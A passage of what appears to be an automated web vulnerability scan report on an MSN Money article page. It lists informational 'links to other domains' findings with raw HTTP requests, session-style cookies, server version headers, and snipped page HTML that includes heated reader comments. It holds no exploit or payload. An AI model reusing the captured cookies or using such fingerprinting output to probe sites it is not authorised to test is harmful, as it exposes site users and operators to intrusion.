...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+file+income+taxes+electronically&amp;form=MONEY3" class="opennew">How to file your taxes electronically</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=smart+phones+ID+theft&amp;form=MONEY3" class="opennew">Is your smart phone safe from ID thieves?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=cars+with+highest+resale+value&amp;form=MONEY3" class="opennew">Cars with the highest resale value</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&amp;form=MONEY3" class="opennew">Surprising things home insurance doesn't cover</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&amp;form=MONEY3" class="opennew">How to convert a traditional IRA to a Roth</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=VimMKAiW&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.200. http://money.redacted/market-news/post.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /market-news/post.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:09:36 GMT
Content-Length: 114372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296353377&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fmarket-news%2Fpost.aspx%3Fpost%3Dfaf89f05-0560-4409-bafb-7a02dc2c6cb5&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<div class="pst_bod" id="abody"><img src="http://media.social.s-redacted/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110128192402_charlie-blaine-164-b.jpg" alt="Charley Blaine" class="imagefloatleft userImage lead" />A week ago, the question was whether the stock market was about to pull back substantially. The answer seemed to be yes. But a pullback was likely to be short and intense. <br />
...[SNIP]...
lBinary', 'True','1');" href="http://money.msn.com/market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
y', 'True','0');" href="http://money.msn.com/market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X19kLPwdz5sB2Fnf9yuXWOdr9kOtEAGL6?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xnro6l_39mWfG4y1hE7LEgx_WqLpHdupL?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XhfDJa04FoRujoDJi4C1LEoyMkBUSqiKS?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xj0dHfUYtwaLtz5YCWnr-VnjhGC9rBkYC?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-72bd862dcafebd15.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Someone
..(jewcanu)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-72bd862dcafebd15.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
;has a nice job. He never really commits to an answer and is much like a weatherman. Guess at the forecast as if they are wrong no one really cares. I guess that&amp;#39;s why they call it forecasting.<img src="http://us.social.s-redacted/s/images/emoticons/72_72.gif" alt="Thinking" class="emoticon" /></div>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XJtNqJBT2IezhkgeuRuClb2a_4QPIhAFx?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XJtNqJBT2IezhkgeuRuClb2a_4QPIhAFx?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xpo_Bpo7oVutnP7wu82moHfnsEkcGreBB?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
s (all forms of government), will eventually always pay with blood. Keep it up corporate America and U.S. government and you will be next! This lesson in history will be learned? NEVER! Stupid people! <img src="http://us.social.s-redacted/s/images/emoticons/75_75.gif" alt="Eye-rolling" class="emoticon" /></div>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-4ce946f01e0695ce.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">David N</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-4ce946f01e0695ce.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XhfDJa04FoRujoDJi4C1LEoyMkBUSqiKS?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X7Rw25xaqP2g6YCmuYWLOzevigGiy9msi?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xpo_Bpo7oVutnP7wu82moHfnsEkcGreBB?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
ck markets? Buying, selling, gambling, lying, stealing, deceiving, manipulating, cutthroating, back stabbing and head chopping,.... you know, the usual routine that goes on everyday at "Fraud Street". <img src="http://us.social.s-redacted/s/images/emoticons/75_75.gif" alt="Eye-rolling" class="emoticon" /></div>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xq0tm3KzL1oq6JFh44a58UPpPNYNAeqHB?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XSN8F5eJocNcl3QJnJ85WhK7gl5LCHOLY?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XS98j_oegJAb0IvDZ9ZtLLsKvWvLQM86S?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&amp;sc_extcmp=JS_2482_home1&amp;ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+file+income+taxes+electronically&amp;form=MONEY3" class="opennew">How to file your taxes electronically</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=smart+phones+ID+theft&amp;form=MONEY3" class="opennew">Is your smart phone safe from ID thieves?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=cars+with+highest+resale+value&amp;form=MONEY3" class="opennew">Cars with the highest resale value</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&amp;form=MONEY3" class="opennew">Surprising things home insurance doesn't cover</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&amp;form=MONEY3" class="opennew">How to convert a traditional IRA to a Roth</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=history+of+the+gold+standard&amp;form=MONEY3" class="opennew">The history of the gold standard</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.201. http://money.redacted/market-news/post.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /market-news/post.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=4b5bf39f834647489c4c910da85e7265; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:47:55 GMT
Content-Length: 110702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344875&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fmarket-news%2Fpost.aspx%3Fpost%3Dfaf89f05-0560-4409-bafb-7a02dc2c6cb5&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<div class="pst_bod" id="abody"><img src="http://media.social.s-redacted/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110128192402_charlie-blaine-164-b.jpg" alt="Charley Blaine" class="imagefloatleft userImage lead" />A week ago, the question was whether the stock market was about to pull back substantially. The answer seemed to be yes. But a pullback was likely to be short and intense. <br />
...[SNIP]...
lBinary', 'True','1');" href="http://money.msn.com/market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
y', 'True','0');" href="http://money.msn.com/market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xj0dHfUYtwaLtz5YCWnr-VnjhGC9rBkYC?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-72bd862dcafebd15.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Someone
..(jewcanu)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-72bd862dcafebd15.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
;has a nice job. He never really commits to an answer and is much like a weatherman. Guess at the forecast as if they are wrong no one really cares. I guess that&amp;#39;s why they call it forecasting.<img src="http://us.social.s-redacted/s/images/emoticons/72_72.gif" alt="Thinking" class="emoticon" /></div>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XJtNqJBT2IezhkgeuRuClb2a_4QPIhAFx?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XJtNqJBT2IezhkgeuRuClb2a_4QPIhAFx?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xpo_Bpo7oVutnP7wu82moHfnsEkcGreBB?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
s (all forms of government), will eventually always pay with blood. Keep it up corporate America and U.S. government and you will be next! This lesson in history will be learned? NEVER! Stupid people! <img src="http://us.social.s-redacted/s/images/emoticons/75_75.gif" alt="Eye-rolling" class="emoticon" /></div>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-4ce946f01e0695ce.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">David N</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-4ce946f01e0695ce.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XhfDJa04FoRujoDJi4C1LEoyMkBUSqiKS?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X7Rw25xaqP2g6YCmuYWLOzevigGiy9msi?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xpo_Bpo7oVutnP7wu82moHfnsEkcGreBB?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
ck markets? Buying, selling, gambling, lying, stealing, deceiving, manipulating, cutthroating, back stabbing and head chopping,.... you know, the usual routine that goes on everyday at "Fraud Street". <img src="http://us.social.s-redacted/s/images/emoticons/75_75.gif" alt="Eye-rolling" class="emoticon" /></div>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xq0tm3KzL1oq6JFh44a58UPpPNYNAeqHB?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XSN8F5eJocNcl3QJnJ85WhK7gl5LCHOLY?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XS98j_oegJAb0IvDZ9ZtLLsKvWvLQM86S?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xnro6l_39mWfG4y1hE7LEgx_WqLpHdupL?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&amp;sc_extcmp=JS_2482_home1&amp;ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+file+income+taxes+electronically&amp;form=MONEY3" class="opennew">How to file your taxes electronically</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=smart+phones+ID+theft&amp;form=MONEY3" class="opennew">Is your smart phone safe from ID thieves?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=cars+with+highest+resale+value&amp;form=MONEY3" class="opennew">Cars with the highest resale value</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&amp;form=MONEY3" class="opennew">Surprising things home insurance doesn't cover</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&amp;form=MONEY3" class="opennew">How to convert a traditional IRA to a Roth</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=history+of+the+gold+standard&amp;form=MONEY3" class="opennew">The history of the gold standard</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.202. http://money.redacted/market-news/post.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /market-news/post.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:54:30 GMT
Content-Length: 116786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
